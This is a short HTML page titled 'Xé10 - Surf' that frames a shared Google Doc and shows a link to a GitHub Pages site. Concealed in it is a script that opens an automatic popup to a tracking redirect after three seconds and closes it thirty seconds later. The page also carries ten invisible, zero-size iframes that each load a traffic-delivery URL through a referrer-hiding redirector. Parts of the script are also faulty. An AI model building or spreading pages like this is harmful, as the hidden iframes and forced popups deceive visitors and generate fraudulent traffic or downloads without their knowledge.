<html>
<head><title>Xé10 - Surf</title>
<style type="text/css">
body {
   margin:0;
}
</style>
<style type="text/css">
 .page{
  position: relative; width:100%; height:100%; overflow:hidden;
 }
 .page iframe {
 position: absolute;
    top: 0;
    left: 0;
    width: 100%;
    height: 100%;
 }
 </style>
</head>
<body>
<script language="JavaScript">
  function popupWin() {
  text +=  "<html>\n<head>\n<title>PopUp Automática</title>\n<body>\n";
  text += "<center>\n<br>";
  text += "<img src='http://'>";
  text += "</center>\n</body>\n</html>\n";
  setTimeout('windowProp(text)', 3000);  // tempo para esperar para abrir
  }
  function windowProp(text) {
  newWindow = window.open('https://supersim.bvr.li/clique/cX9870160Hcj','newWin','width=800,height=500');
  newWindow.document.write(text);
  setTimeout('closeWin(newWindow)', 30000); // tempo para ficar aberto antes de fechar
  }
  function closeWin(newWindow) {
  newWindow.close();
  }
  
  window.onload = popupWin();
  
  </script>

<div class="page">
     <iframe src="https://docs.google.com/document/d/1OW16oFQDT-qzxL4DwG3nuwVmZolYqN972W8vxEBQm8Q/edit?usp=sharing" frameborder="0" allowfullscreen></iframe>
 </div>
  <center><h1>Clique</h1><a href="http://xe10glb.github.io/home.html"><p>Link acessar: http://xe10glb.github.io/home.html</p></a>
   <iframe src="https://href.li/?https://traffdaq.com/delivery/dl/91134?category=general" name="myIFrame" width="0%" height="0%" style="border: solid #000000;"></iframe>
     <iframe src="https://href.li/?https://traffdaq.com/delivery/dl/91134?category=general" name="myIFrame" width="0%" height="0%" style="border: solid #000000;"></iframe>
     <iframe src="https://href.li/?https://traffdaq.com/delivery/dl/91134?category=general" name="myIFrame" width="0%" height="0%" style="border: solid #000000;"></iframe>
     <iframe src="https://href.li/?https://traffdaq.com/delivery/dl/91134?category=general" name="myIFrame" width="0%" height="0%" style="border: solid #000000;"></iframe>
     <iframe src="https://href.li/?https://traffdaq.com/delivery/dl/91134?category=general" name="myIFrame" width="0%" height="0%" style="border: solid #000000;"></iframe>
     <iframe src="https://href.li/?https://traffdaq.com/delivery/dl/91134?category=general" name="myIFrame" width="0%" height="0%" style="border: solid #000000;"></iframe>
     <iframe src="https://href.li/?https://traffdaq.com/delivery/dl/91134?category=general" name="myIFrame" width="0%" height="0%" style="border: solid #000000;"></iframe>
     <iframe src="https://href.li/?https://traffdaq.com/delivery/dl/91134?category=general" name="myIFrame" width="0%" height="0%" style="border: solid #000000;"></iframe>
     <iframe src="https://href.li/?https://traffdaq.com/delivery/dl/91134?category=general" name="myIFrame" width="0%" height="0%" style="border: solid #000000;"></iframe>
     <iframe src="https://href.li/?https://traffdaq.com/delivery/dl/91134?category=general" name="myIFrame" width="0%" height="0%" style="border: solid #000000;"></iframe>
   </center>
</body>
</html>
